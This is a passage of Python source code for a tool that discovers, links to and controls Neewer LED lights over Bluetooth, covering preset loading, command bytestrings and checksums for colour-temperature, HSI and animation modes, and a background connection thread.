else: # if it isn't, then just return the default parameters for this preset
return defaultLightPresets[numOfPreset]
def loadCustomPresets():
global customLightPresets
# READ THE PREFERENCES FILE INTO A LIST
fileToOpen = open(customLightPresetsFile)
customPresets = fileToOpen.read().split("\n")
fileToOpen.close()
acceptable_arguments = ["customPreset0", "customPreset1", "customPreset2", "customPreset3", \
"customPreset4", "customPreset5", "customPreset6", "customPreset7"]
for a in range(len(customPresets) - 1, -1, -1):
if not any(x in customPresets[a] for x in acceptable_arguments): # if the current argument is invalid
customPresets.pop(a) # delete the invalid argument from the list
# NOW THAT ANY STRAGGLERS ARE OUT, ADD DASHES TO WHAT REMAINS TO PROPERLY PARSE IN THE PARSER
for a in range(len(customPresets)):
customPresets[a] = "--" + customPresets[a]
customPresetParser = argparse.ArgumentParser()
customPresetParser.add_argument("--customPreset0", default=-1)
customPresetParser.add_argument("--customPreset1", default=-1)
customPresetParser.add_argument("--customPreset2", default=-1)
customPresetParser.add_argument("--customPreset3", default=-1)
customPresetParser.add_argument("--customPreset4", default=-1)
customPresetParser.add_argument("--customPreset5", default=-1)
customPresetParser.add_argument("--customPreset6", default=-1)
customPresetParser.add_argument("--customPreset7", default=-1)
customPresets = customPresetParser.parse_args(customPresets)
if customPresets.customPreset0 != -1:
customLightPresets[0] = stringToCustomPreset(customPresets.customPreset0, 0)
if customPresets.customPreset1 != -1:
customLightPresets[1] = stringToCustomPreset(customPresets.customPreset1, 1)
if customPresets.customPreset2 != -1:
customLightPresets[2] = stringToCustomPreset(customPresets.customPreset2, 2)
if customPresets.customPreset3 != -1:
customLightPresets[3] = stringToCustomPreset(customPresets.customPreset3, 3)
if customPresets.customPreset4 != -1:
customLightPresets[4] = stringToCustomPreset(customPresets.customPreset4, 4)
if customPresets.customPreset5 != -1:
customLightPresets[5] = stringToCustomPreset(customPresets.customPreset5, 5)
if customPresets.customPreset6 != -1:
customLightPresets[6] = stringToCustomPreset(customPresets.customPreset6, 6)
if customPresets.customPreset7 != -1:
customLightPresets[7] = stringToCustomPreset(customPresets.customPreset7, 7)
# RETURN THE CORRECT NAME FOR THE IDENTIFIER OF THE LIGHT (FOR DEBUG STRINGS)
def returnMACname():
if platform.system() == "Darwin":
return "UUID:"
else:
return "MAC Address:"
# TEST TO MAKE SURE THE VALUE GIVEN TO THE FUNCTION IS VALID OR IN BOUNDS
def testValid(theParam, theValue, defaultValue, startBounds, endBounds):
if theParam == "temp":
if len(theValue) > 1: # if the temp has at least 2 characters in it
theValue = theValue[:2] # take the first 2 characters of the string to convert into int
else: # it either doesn't have enough characters, or isn't a number
printDebugString(" >> error with --temp specified (not enough digits or not a number), so falling back to default value of " + str(defaultValue))
theValue = defaultValue # default to 56(00)K for color temperature
try: # try converting the string into an integer and processing the bounds
theValue = int(theValue) # the value is assumed to be within the bounds, so we check it...
if theValue < startBounds or theValue > endBounds: # the value is not within bounds, so there's an error
if theValue < startBounds: # if the value specified is below the starting boundary, make it the starting boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(startBounds))
theValue = startBounds
elif theValue > endBounds: # if the value specified is above the ending boundary, make it the ending boundary
printDebugString(" >> --" + theParam + " (" + str(theValue) + ") isn't between the bounds of " + str(startBounds) + " and " + str(endBounds) + ", so falling back to closest boundary of " + str(endBounds))
theValue = endBounds
return theValue # return the within-bounds value
except ValueError: # if the string can not be converted, then return the defaultValue
printDebugString(" >> --" + theParam + " specified is not a number - falling back to default value of " + str(defaultValue))
return defaultValue # return the default value
# PRINT A DEBUG STRING TO THE CONSOLE, ALONG WITH THE CURRENT TIME
def printDebugString(theString):
if printDebug == True:
now = datetime.now()
currentTime = now.strftime("%H:%M:%S")
print("[" + currentTime + "] - " + theString)
# CALCULATE THE BYTESTRING TO SEND TO THE LIGHT
def calculateByteString(returnValue = False, **modeArgs):
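# Illustrative example packets (the last byte of each is the checksum from calculateChecksum()):
#   CCT  5600K @ 100%         -> [120, 135, 2, 100, 56, 157]
#   HSI  H=240, S=100, I=100  -> [120, 134, 4, 240, 0, 100, 100, 186]
#   ANM  scene 1 @ 100%       -> [120, 136, 2, 100, 1, 103]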
if modeArgs["colorMode"] == "CCT":
# We're in CCT (color balance) mode
computedValue = [120, 135, 2, 0, 0, 0]
computedValue[3] = int(modeArgs["brightness"]) # the brightness value
computedValue[4] = int(modeArgs["temp"]) # the color temp value, ranging from 32(00K) to 85(00)K - some lights (like the SL-80) can go as high as 8500K
computedValue[5] = calculateChecksum(computedValue) # compute the checksum
elif modeArgs["colorMode"] == "HSI":
# We're in HSI (any color of the spectrum) mode
computedValue = [120, 134, 4, 0, 0, 0, 0, 0]
computedValue[3] = int(modeArgs["HSI_H"]) & 255 # hue value, up to 255
computedValue[4] = (int(modeArgs["HSI_H"]) & 65280) >> 8 # offset value, computed from above value
computedValue[5] = int(modeArgs["HSI_S"]) # saturation value
computedValue[6] = int(modeArgs["HSI_I"]) # intensity value
computedValue[7] = calculateChecksum(computedValue) # compute the checksum
elif modeArgs["colorMode"] == "ANM":
# We're in ANM (animation) mode
computedValue = [120, 136, 2, 0, 0, 0]
computedValue[3] = int(modeArgs["brightness"]) # brightness value
computedValue[4] = int(modeArgs["animation"]) # the number of animation you're going to run (check comments above)
computedValue[5] = calculateChecksum(computedValue) # compute the checksum
else:
computedValue = [0]
if returnValue == False: # if we aren't supposed to return a value, then just set sendValue to the value returned from computedValue
global sendValue
sendValue = computedValue
else:
return computedValue # return the computed value
# RECALCULATE THE BYTESTRING FOR CCT-ONLY NEEWER LIGHTS INTO HUE AND BRIGHTNESS SEPARATELY
def calculateSeparateBytestrings(sendValue):
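# CCT-only lights (e.g. the SNL-660) take brightness and hue/temperature as two separate packets: mode byte
# 130 carries just the brightness and mode byte 131 carries just the temperature, each with its own checksum.
# For example, a CCT packet of [120, 135, 2, 100, 56, 157] splits into [120, 130, 1, 100, 95] and [120, 131, 1, 56, 52].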
# CALCULATE BRIGHTNESS ONLY PARAMETER FROM MAIN PARAMETER
newValueBRI = [120, 130, 1, sendValue[3], 0]
newValueBRI[4] = calculateChecksum(newValueBRI)
# CALCULATE HUE ONLY PARAMETER FROM MAIN PARAMETER
newValueHUE = [120, 131, 1, sendValue[4], 0]
newValueHUE[4] = calculateChecksum(newValueHUE)
if CCTSlider == -1: # return both newly computed values
return [newValueBRI, newValueHUE]
elif CCTSlider == 1: # return only the brightness value
return newValueBRI
elif CCTSlider == 2: # return only the hue value
return newValueHUE
def setPowerBytestring(onOrOff):
global sendValue
if onOrOff == "ON":
sendValue = [120, 129, 1, 1, 251] # return the "turn on" bytestring
else:
sendValue = [120, 129, 1, 2, 252] # return the "turn off" bytestring
# MAKE CURRENT BYTESTRING INTO A STRING OF HEX CHARACTERS TO SHOW THE CURRENT VALUE BEING GENERATED BY THE PROGRAM
def updateStatus(splitString = False, customValue=False):
currentHexString = ""
if customValue == False:
customValue = sendValue
if splitString == False: # False is for the status bar (shows the bytestring computed as one long line)
for a in range(len(customValue)):
currentHexString = currentHexString + " " + str(hex(customValue[a]))
else: # True is for the table view, which no longer shows the raw bytestring, but a readable status of the current mode (temp/bri/hue, etc.)
currentHexString = ""
if customValue[1] == 134:
currentHexString = "(HSI MODE):\n"
currentHexString = currentHexString + " H: " + str(customValue[3] + (256 * customValue[4])) + u'\N{DEGREE SIGN}' + " / S: " + str(customValue[5]) + " / I: " + str(customValue[6])
elif customValue[1] == 135:
currentHexString = "(CCT MODE):\n"
currentHexString = currentHexString + " TEMP: " + str(customValue[4]) + "00K / BRI: " + str(customValue[3])
elif customValue[1] == 136:
currentHexString = "(ANM/SCENE MODE):\n"
currentHexString = currentHexString + " SCENE: " + str(customValue[4]) + " / BRI: " + str(customValue[3])
return currentHexString
# CALCULATE THE CHECKSUM FROM THE BYTESTRING
def calculateChecksum(sendValue):
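# The checksum is simply the sum of every byte except the last one, masked to 8 bits -
# e.g. for [120, 135, 2, 100, 56, _]: (120 + 135 + 2 + 100 + 56) & 255 = 413 & 255 = 157.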
checkSum = 0
for a in range(len(sendValue) - 1):
if sendValue[a] < 0:
checkSum = checkSum + int(sendValue[a] + 256)
else:
checkSum = checkSum + int(sendValue[a])
checkSum = checkSum & 255
return checkSum
# FIND NEW LIGHTS
async def findDevices():
global availableLights
printDebugString("Searching for new lights")
currentScan = [] # add all the current scan's lights detected to a standby array (to check against the main one)
devices = await BleakScanner.discover() # scan all available Bluetooth devices nearby
for d in devices: # go through all of the devices Bleak just found
if d.address in whiteListedMACs: # if the MAC address is in the list of whitelisted addresses, add this device
printDebugString("Matching whitelisted address found - " + returnMACname() + " " + d.address + ", adding to the list")
currentScan.append(d)
else: # if this device is not whitelisted, check to see if it's valid (contains "NEEWER" in the name)
if d.name != None and "NEEWER" in d.name: # if Bleak returned a proper string, and the string has "NEEWER" in the name
currentScan.append(d) # add this light to this session's available lights
for a in range(len(currentScan)): # scan the newly found NEEWER devices
newLight = True # initially mark this light as a "new light"
# check the "new light" against the global list
for b in range(len(availableLights)):
if currentScan[a].address == availableLights[b][0].address: # if the new light's MAC address matches one already in the global list
printDebugString("Light found! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " but it's already in the list. It may have disconnected, so relinking might be necessary.")
newLight = False # then don't add another instance of it
# if we found the light *again*, it's most likely the light disconnected, so we need to link it again
availableLights[b][0].rssi = currentScan[a].rssi # update the RSSI information
availableLights[b][1] = "" # clear the Bleak connection (as it's changed) to force the light to need re-linking
break # stop checking once we've found a match in the global list
if newLight == True: # if this light was not found in the global list, then we need to add it
printDebugString("Found new light! [" + currentScan[a].name + "] " + returnMACname() + " " + currentScan[a].address + " RSSI: " + str(currentScan[a].rssi) + " dBm")
customPrefs = getCustomLightPrefs(currentScan[a].address, currentScan[a].name)
if len(customPrefs) == 3: # we need to rename the light and set up CCT and color temp range
availableLights.append([currentScan[a], "", customPrefs[0], [120, 135, 2, 20, 56, 157], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
elif len(customPrefs) == 4: # same as above, but we have previously stored parameters, so add them in as well
availableLights.append([currentScan[a], "", customPrefs[0], customPrefs[3], customPrefs[1], customPrefs[2], True, ["---", "---"]]) # add it to the global list
if threadAction != "quit":
return "" # once the device scan is over, set the threadAction to nothing
else: # if we're requesting that we quit, then just quit
return "quit"
def getCustomLightPrefs(MACAddress, lightName = ""):
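# Returns [customName, widerCCTRange, onlyCCTMode] (plus a 4th element with the last used parameters, as a
# list of ints, if one was saved) - read back from the same pipe-delimited sidecar file that saveLightPrefs()
# writes, or built from per-model defaults if no file exists for this light.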
customPrefsPath = MACAddress.split(":")
customPrefsPath = os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs" + os.sep + "".join(customPrefsPath)
if os.path.exists(customPrefsPath):
printDebugString("A custom preferences file was found for " + MACAddress + "!")
# READ THE PREFERENCES FILE INTO A LIST
fileToOpen = open(customPrefsPath)
customPrefs = fileToOpen.read().split("|")
fileToOpen.close()
# CHANGE STRING "Booleans" INTO ACTUAL BOOLEANS
for b in range(1,3):
if customPrefs[b] == "True":
customPrefs[b] = True
else:
customPrefs[b] = False
if len(customPrefs) == 4: # if we have a 4th element (the last used parameters), then load them here
customPrefs[3] = customPrefs[3].replace(" ", "").split(",") # split the last params into a list
for a in range(len(customPrefs[3])): # convert the string values to ints
customPrefs[3][a] = int(customPrefs[3][a])
else: # if there is no custom preferences file, still check the name against a list of per-light parameters
if lightName == "NEEWER-SL80": # we can use extended ranges with the SL80
customPrefs = ["", True, False]
elif lightName == "NEEWER-SNL660": # we can ONLY use CCT mode with the SNL-660
customPrefs = ["", False, True]
else: # return a blank slate
customPrefs = ["", False, False]
return customPrefs
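# A sketch of the per-light preferences file format implied by the parser above: each light gets
# a file named after its MAC address (colons removed) inside the light_prefs folder, holding 3 or
# 4 pipe-delimited fields (the example values below are purely illustrative):
#   custom name|extended CCT range (True/False)|CCT-only light (True/False)|last params
#   e.g.  Key Light|True|False|120, 135, 2, 20, 56, 157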
# CONNECT (LINK) TO A LIGHT
async def connectToLight(selectedLight, updateGUI=True):
global availableLights
isConnected = False # whether or not the light is connected
returnValue = "" # the value to return to the thread (in GUI mode, a string) or True/False (in CLI mode, a boolean value)
lightName = availableLights[selectedLight][0].name # the Name of the light (for status updates)
lightMAC = availableLights[selectedLight][0].address # the MAC address of the light (to keep track of the light even if the index number changes)
# FILL THE [1] ELEMENT OF THE availableLights ARRAY WITH THE BLEAK CONNECTION
if availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1] == "":
availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1] = BleakClient(availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][0])
await asyncio.sleep(0.25) # wait just a short time before trying to connect
# TRY TO CONNECT TO THE LIGHT SEVERAL TIMES BEFORE GIVING UP THE LINK
currentAttempt = 1
while isConnected == False and currentAttempt <= maxNumOfAttempts:
if threadAction != "quit":
try:
if not availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1].is_connected: # if the current device isn't linked to Bluetooth
printDebugString("Attempting to link to light [" + lightName + "] " + returnMACname() + " " + lightMAC + " (Attempt " + str(currentAttempt) + " of " + str(maxNumOfAttempts) + ")")
isConnected = await availableLights[returnLightIndexesFromMacAddress(lightMAC)[0]][1].connect() # try connecting it (and return the connection status)
else:
isConnected = True # the light is already connected, so mark it as being connected
except Exception as e:
printDebugString("Error linking to light [" + lightName + "] " + returnMACname() + " " + lightMAC)
if updateGUI == True:
if currentAttempt < maxNumOfAttempts:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light, trying again (Attempt " + str(currentAttempt + 1) + " of " + str(maxNumOfAttempts) + ")..."], returnLightIndexesFromMacAddress(lightMAC)[0]) # there was an issue connecting this specific light to Bluetooth, so show that
else:
returnValue = False # if we're in CLI mode, and there is an error connecting to the light, return False
currentAttempt = currentAttempt + 1
await asyncio.sleep(4) # wait a few seconds before trying to link to the light again
else:
return "quit"
if threadAction == "quit":
return "quit"
else:
if isConnected == True:
printDebugString("Successful link on light [" + lightName + "] " + returnMACname() + " " + lightMAC)
if updateGUI == True:
mainWindow.setTheTable(["", "", "LINKED", "Waiting to send..."], returnLightIndexesFromMacAddress(lightMAC)[0]) # if it's successful, show that in the table
else:
returnValue = True # if we're in CLI mode, and there is no error connecting to the light, return True
else:
if updateGUI == True:
mainWindow.setTheTable(["", "", "NOT\nLINKED", "There was an error connecting to the light"], returnLightIndexesFromMacAddress(lightMAC)[0]) # there was an issue connecting this specific light to Bluetooth, so show that
returnValue = False # the light is not connected
return returnValue # once the connection is over, then return either True or False (for CLI) or nothing (for GUI)
async def readNotifyCharacteristic(selectedLight, diagCommand, typeOfData):
# clear the global variable before asking the light for info
global receivedData
receivedData = ""
try:
await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # start reading notifications from the light
except Exception as e:
try: # if we've resorted the list, there is a possibility of a hanging callback, so this will raise an exception
await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # so we need to try disconnecting first
await asyncio.sleep(0.5) # wait a little bit of time before re-connecting to the callback
await availableLights[selectedLight][1].start_notify(notifyLightUUID, notifyCallback) # try again to start reading notifications from the light
except Exception as e: # if we truly can't connect to the callback, return a blank string
return "" # if there is an error starting the characteristic scan, just quit out of this routine
for a in range(maxNumOfAttempts): # attempt maxNumOfAttempts times to read the characteristics
try:
await availableLights[selectedLight][1].write_gatt_char(setLightUUID, bytearray(diagCommand))
except Exception as e:
return "" # if there is an error checking the characteristic, just quit out of this routine
if receivedData != "": # if the received data is populated
if len(receivedData) > 1: # if we have enough elements to get a status from
if receivedData[1] == typeOfData: # if the data returned is the correct *kind* of data
break # stop scanning for data
else: # if we have a list, but it doesn't have a payload in it (the light didn't supply enough data)
receivedData = "---" # then just reset receivedData to the default string
break # stop scanning for data
else:
await asyncio.sleep(0.25) # wait a little bit of time before checking again
try:
await availableLights[selectedLight][1].stop_notify(notifyLightUUID) # stop reading notifications from the light
except Exception as e:
pass # we will return whatever data remains from the scan, so if we can't stop the scan (light disconnected), just return what we have
return receivedData
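# A rough outline of the status-query handshake used above (assumed from the code in this file,
# not from any official Neewer documentation): subscribe to notifications on notifyLightUUID,
# write a short "diagnostic" command to setLightUUID, then poll receivedData until its second
# byte matches the expected reply type. For example, getLightChannelandPower() below sends
# [120, 133, 0, 253] and expects a reply of type 2 (power state), then [120, 132, 0, 252] and
# expects a reply of type 1 (current channel).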
async def getLightChannelandPower(selectedLight):
global availableLights
returnInfo = ["---", "---"] # the power and channel information to return about the light
powerInfo = await readNotifyCharacteristic(selectedLight, [120, 133, 0, 253], 2)
try:
if powerInfo != "":
if powerInfo[3] == 1:
returnInfo[0] = "ON"
elif powerInfo[3] == 2:
returnInfo[0] = "STBY"
# IF THE LIGHT IS ON, THEN ATTEMPT TO READ THE CURRENT CHANNEL
chanInfo = await readNotifyCharacteristic(selectedLight, [120, 132, 0, 252], 1)
if chanInfo != "": # if we got a result from the query
try:
returnInfo[1] = chanInfo[3] # set the current channel to the returned result
except IndexError:
pass # if we have an index error (the above value doesn't exist), then leave the channel at its default value
except IndexError:
# if we have an IndexError (the information returned isn't blank, but also isn't enough to decipher the status)
# then just error out, but print the information that *was* returned for debugging purposes
printDebugString("We don't have enough information from light [" + availableLights[selectedLight][0].name + "] to get the status.")
print(powerInfo)
availableLights[selectedLight][7][0] = returnInfo[0]
if availableLights[selectedLight][1] != "---" and returnInfo[1] != "---":
availableLights[selectedLight][7][1] = returnInfo[1]
def notifyCallback(sender, data):
global receivedData
receivedData = data
# DISCONNECT FROM A LIGHT
async def disconnectFromLight(selectedLight, updateGUI=True):
returnValue = "" # same as above, string for GUI mode and boolean for CLI mode, default to blank string
if availableLights[selectedLight][1] != "": # if there is a Bleak object attached to the light, try to disconnect
try:
if availableLights[selectedLight][1].is_connected: # if the current light is connected
await availableLights[selectedLight][1].disconnect() # disconnect the selected light
except Exception as e:
returnValue = False # if we're in CLI mode, then return False if there is an error disconnecting
printDebugString("Error unlinking from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
print(e)
try:
if not availableLights[selectedLight][1].is_connected: # if the current light is NOT connected, then we're good
if updateGUI == True: # if we're using the GUI, update the display (if we're waiting)
mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], selectedLight) # show the new status in the table
else: # if we're not, then indicate that we're good
returnValue = True # if we're in CLI mode, then return True when the light disconnects successfully
printDebugString("Successfully unlinked from light " + str(selectedLight + 1) + " [" + availableLights[selectedLight][0].name + "] " + returnMACname() + " " + availableLights[selectedLight][0].address)
except AttributeError:
printDebugString("Light " + str(selectedLight + 1) + " has no Bleak object attached to it, so not attempting to disconnect from it")
return returnValue
# WRITE TO A LIGHT - optional arguments for the CLI version (GUI version doesn't use either of these)
async def writeToLight(selectedLights=0, updateGUI=True, useGlobalValue=True):
global availableLights
returnValue = "" # same as above, return value "" for GUI, or boolean for CLI
startTimer = time.time() # the start of the triggering
printDebugString("Going into send mode")
try:
if updateGUI == True:
if selectedLights == 0:
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights from the GUI table
else:
if type(selectedLights) is int: # if we specify an integer-based index
selectedLights = [selectedLights] # convert asked-for light to list
currentSendValue = [] # initialize the value check
# if there are lights selected (otherwise just dump out), and the delay timer is less than its maximum, then try to send to the lights selected
while len(selectedLights) > 0 and time.time() - startTimer < 0.4:
if currentSendValue != sendValue: # if the current value is different than what was last sent to the light, then send a new one
currentSendValue = sendValue # get this value before sending to multiple lights, to ensure the same value is sent to each one
for a in range(len(selectedLights)): # try to write each light in turn, and show the current data being sent to them in the table
# THIS SECTION IS FOR LOADING SNAPSHOT PRESET POWER STATES
if useGlobalValue == False: # if we're forcing the lights to use their stored parameters, then load that in here
if availableLights[selectedLights[a]][3][0] == 0: # we want to turn the light off
availableLights[selectedLights[a]][3][0] = 120 # reset the light's value to the normal value
currentSendValue = [120, 129, 1, 2, 252] # set the send value to turn the light off downstream
else: # we want to turn the light on and run a snapshot preset
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray([120, 129, 1, 1, 251]), False) # force this light to turn on
availableLights[int(selectedLights[a])][6] = True # set the ON flag of this light to True
await asyncio.sleep(0.05)
currentSendValue = availableLights[selectedLights[a]][3] # set the send value to set the preset downstream
if availableLights[selectedLights[a]][1] != "": # if a Bleak connection is there
try:
if availableLights[(int(selectedLights[a]))][5] == True: # if we're using the old style of light
if currentSendValue[1] == 135: # if we're on CCT mode
if CCTSlider == -1: # and we need to write both HUE and BRI to the light
splitCommands = calculateSeparateBytestrings(currentSendValue) # get both commands from the converter
# WRITE BOTH LUMINANCE AND HUE VALUES TOGETHER, BUT SEPARATELY
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[0]), False)
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[1]), False)
else: # we're only writing either HUE or BRI independently
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(calculateSeparateBytestrings(currentSendValue)), False)
elif currentSendValue[1] == 129: # we're using an old light, but we're either turning the light on or off
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
elif currentSendValue[1] == 134: # we can't use HSI mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use HSI mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
elif currentSendValue[1] == 136: # we can't use ANM/SCENE mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use ANM/SCENE mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
else: # we're using a "newer" Neewer light, so just send the original calculated value
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
if updateGUI == True:
# if we're not looking at an old light, or if we are, we're not in either HSI or ANM modes, then update the status of that light
if not (availableLights[(int(selectedLights[a]))][5] == True and (currentSendValue[1] == 134 or currentSendValue[1] == 136)):
if currentSendValue[1] != 129: # if we're not turning the light on or off
mainWindow.setTheTable(["", "", "", updateStatus(True, currentSendValue)], int(selectedLights[a]))
else: # we ARE turning the light on or off
if currentSendValue[3] == 1: # we turned the light on
availableLights[int(selectedLights[a])][6] = True # toggle the "light on" parameter of this light to ON
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("STBY", "ON")
mainWindow.setTheTable(["", "", changeStatus, "Light turned on"], int(selectedLights[a]))
else: # we turned the light off
availableLights[int(selectedLights[a])][6] = False # toggle the "light on" parameter of this light to OFF
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("ON", "STBY")
mainWindow.setTheTable(["", "", changeStatus, "Light turned off\nA long period of inactivity may require a re-link to the light"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light
if currentSendValue[1] != 129: # if we didn't just send a command to turn the light on/off
availableLights[selectedLights[a]][3] = currentSendValue # store the currently sent value to recall later
except Exception as e:
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Error Sending to light!"], int(selectedLights[a]))
else: # if there is no Bleak object associated with this light (otherwise, it's been found, but not linked)
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Light isn't linked yet, can't send to it"], int(selectedLights[a]))
else:
returnValue = 0 # the light is not linked, even though it *should* be if it gets to this point, so this is an odd error
if useGlobalValue == True:
startTimer = time.time() # if we sent a value, then reset the timer
else:
break # don't do the loop again (as we just want to send the commands once instead of look for newly selected lights)
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
if updateGUI == True:
selectedLights = mainWindow.selectedLights() # re-acquire the current list of selected lights
except Exception as e:
printDebugString("There was an error communicating with the light.")
print(e)
if updateGUI == False:
returnValue = False # there was an error writing to this light, so return False to the CLI
if updateGUI == True:
if threadAction != "quit": # if we've been asked to quit somewhere else in the program
printDebugString("Leaving send mode and going back to background thread")
else:
printDebugString("The program has requested to quit, so we're not going back to the background thread")
returnValue = "quit"
return returnValue
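# A note on the command bytestrings handled above (inferred from the literal values used in this
# file rather than from a published protocol): commands start with 120 (0x78), followed by a mode
# tag - 129 power on/off, 134 HSI, 135 CCT, 136 ANM/SCENE - then a payload length, the payload
# bytes, and a trailing byte that appears to be the sum of all preceding bytes modulo 256
# (e.g. [120, 129, 1, 1, 251], where 120 + 129 + 1 + 1 = 251).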
# USE THIS FUNCTION TO CONNECT TO ONE LIGHT (for CLI mode) AND RETRIEVE ANY CUSTOM PREFS (necessary for lights like the SNL-660)
async def connectToOneLight(MACAddress):
global availableLights
try:
currentLightToAdd = await BleakScanner.find_device_by_address(MACAddress)
customLightPrefs = getCustomLightPrefs(currentLightToAdd.address, currentLightToAdd.name)
availableLights = [[currentLightToAdd, "", customLightPrefs[0], [], customLightPrefs[1], customLightPrefs[2], True]]
except Exception as e:
printDebugString("Error finding the Neewer light with MAC address " + MACAddress)
print(e)
# THE BACKGROUND WORKER THREAD
def workerThread(_loop):
global threadAction
# A LIST OF LIGHTS THAT DON'T SEND POWER/CHANNEL STATUS
lightsToNotCheckPower = ["NEEWER-RGB176"]
if findLightsOnStartup == True: # if we're set to find lights at startup, then automatically set the thread to discovery mode
threadAction = "discover"
delayTicks = 1 # count a few ticks before checking light information
while True:
if delayTicks < 12:
delayTicks += 1
elif delayTicks == 12:
delayTicks = 1
printDebugString("Background Thread Running")
# CHECK EACH LIGHT AGAINST THE TABLE TO SEE IF THERE ARE CONNECTION ISSUES
for a in range(len(availableLights)):
if threadAction == "": # if we're not sending, then update the light info... (check this before scanning each light)
if availableLights[a][1] != "": # if there is a Bleak object, then check to see if it's connected
if not availableLights[a][1].is_connected: # the light is disconnected, but we're reporting it isn't
mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], a) # show the new status in the table
availableLights[a][1] = "" # clear the Bleak object
else:
if availableLights[a][0].name not in lightsToNotCheckPower: # if the name of the current light is not in the list to skip checking
_loop.run_until_complete(getLightChannelandPower(a)) # then check the power and light status of that light
mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[a][7][0] + " / ᴄʜ. " + str(availableLights[a][7][1]), ""], a)
else: # if the light we're scanning doesn't supply power or channel status, then just show "LINKED"
mainWindow.setTheTable(["", "", "LINKED", ""], a)
if threadAction == "quit":
printDebugString("Stopping the background thread")
threadAction = "finished"
break # stop the background thread before quitting the program
elif threadAction == "discover":
threadAction = _loop.run_until_complete(findDevices()) # add new lights to the main array
if threadAction != "quit":
mainWindow.updateLights() # tell the GUI to update its list of available lights
if autoConnectToLights == True: # if we're set to automatically link to the lights on startup, then do it here
#for a in range(len(availableLights)):
if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
_loop.run_until_complete(parallelAction("connect", [-1])) # connect to each available light in parallel
threadAction = ""
elif threadAction == "connect":
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights
if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
_loop.run_until_complete(parallelAction("connect", selectedLights)) # connect to each *selected* light in parallel
threadAction = ""
elif threadAction == "send":
threadAction = _loop.run_until_complete(writeToLight()) # write a value to the light(s) - the selectedLights() section is in the write loop itself for responsiveness
elif threadAction != "":
threadAction = processMultipleSends(_loop, threadAction)
time.sleep(0.25)
def processMultipleSends(_loop, threadAction, updateGUI = True):
currentThreadAction = threadAction.split("|")
if currentThreadAction[0] == "send": # this will come from loading a custom snapshot preset
lightsToSendTo = [] # the current lights to affect
for a in range(1, len(currentThreadAction)): # find the lights that need to be refreshed
lightsToSendTo.append(int(currentThreadAction[a]))
threadAction = _loop.run_until_complete(writeToLight(lightsToSendTo, updateGUI, False)) # write the value stored in the lights to the light(s)
return threadAction
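# The compound threadAction strings handled here are pipe-delimited - for example, "send|1|3"
# asks the worker thread to re-send the stored parameters of the lights at indexes 1 and 3 in
# availableLights (the indexes in this example are illustrative; they come from whichever
# snapshot preset was recalled).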
async def parallelAction(theAction, theLights, updateGUI = True):
# SUBMIT A SERIES OF PARALLEL ASYNCIO FUNCTIONS TO RUN ALL IN PARALLEL
parallelFuncs = []
if theLights[0] == -1: # if we have no specific lights set, then operate on the entire availableLights range
theLights = [] # clear the selected light list
for a in range(len(availableLights)):
theLights.append(a) # add all of availableLights to the list
for a in range(len(theLights)):
if theAction == "connect": # connect to a series of lights
parallelFuncs.append(connectToLight(theLights[a], updateGUI))
elif theAction == "disconnect": # disconnect from a series of lights
parallelFuncs.append(disconnectFromLight(theLights[a], updateGUI))
await asyncio.gather(*parallelFuncs) # run the functions in parallel
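# Minimal usage sketch (illustrative): connect to the lights at indexes 0 and 2 without touching
# the GUI -
#   loop.run_until_complete(parallelAction("connect", [0, 2], updateGUI=False))
# Passing [-1] as the light list operates on every light in availableLights instead.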
def processCommands(listToProcess=[]):
inStartupMode = False # if we're in startup mode (so report that to the log), start as False initially to be set to True below
# SET THE CURRENT LIST TO THE sys.argv SYSTEM PARAMETERS LIST IF A LIST ISN'T SPECIFIED
# SO WE CAN USE THIS SAME FUNCTION TO PARSE HTML ARGUMENTS USING THE HTTP SERVER AND COMMAND-LINE ARGUMENTS
if len(listToProcess) == 0: # if there aren't any elements in the list, then check against sys.argv
listToProcess = sys.argv[1:] # the list to parse is the system args minus the first one
inStartupMode = True
# ADD DASHES TO ANY PARAMETERS THAT DON'T CURRENTLY HAVE THEM AS WELL AS
# CONVERT ALL ARGUMENTS INTO lower case (to allow ALL CAPS arguments to parse correctly)
